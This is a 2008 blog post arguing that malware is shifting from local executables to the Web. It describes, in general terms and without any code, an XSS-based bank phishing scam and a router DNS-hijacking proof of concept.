Archive for January 12th, 2008

The future of malware doesn't belong to our hard disks.
While we're still trying to harden our PCs against malicious executables by using unprivileged accounts, wrapping our browsers inside sandboxes and trusting antivirus programs, our digital assets are quickly moving to another place: how much of our identity and money is already on the Web? Even better, how much of our identity and money is not available somewhere on the Web yet?

Since most malware is after our identity, our money or both, why shouldn't it follow the same path?
And if today's malware mostly runs on Windows because it's the commonest executable platform, tomorrow's will likely run on the Web, for the very same reason. Because, like it or not, Web is already a huge executable platform, and we should start thinking at it this way, from a security perspective.

I know my words may sound too much speculative, even plain FUD, but real scams and very scary proof of concepts are already here, mocking the "old school" belief that only local execution and privilege escalation are severe threats:

  • Real scam -- The ultimate bank phishing using XSS.
    The credential harvesting form has been embedded inside the real bank page, served through a "secure" HTTPS connection with a valid SSL certificate, exploiting a reflected XSS vulnerability. Absolutely nothing new, and a relatively poorly performed trick too: the attackers could have as easily choose to host the whole payload inside their XSS vector itself, making their fraud even stealthier without the remote inclusion of an external resource from a different domain. But since they didn't, surely they estimated their way is good enough to work -- and it is, much more than any other phishing attempt you've seen so far, because this is the real bank site!!!
  • Scary Proof of Concept -- Malicious web page hijacking your router.
    You may think you've already heard this one: "Just change the default password, it's basic common sense" you say.
    But this time it's different: GNUCITIZEN guys show us how to compromise your router's DNS settings from the web with no need to log in, by exploiting its "cool" UPnP features through XmlHttpRequest (if a XSS vulnerability is available, as it happens in many devices) or Flash (if no XSS is found). And once an attacker owns your router's DNS, he controls all your LAN, not just your own traffic...

Does anybody still believe browsing the Web with Flash and JavaScript promiscuously enabled and no XSS protection is a good idea?

Bad Behavior has blocked 2549 access attempts in the last 7 days.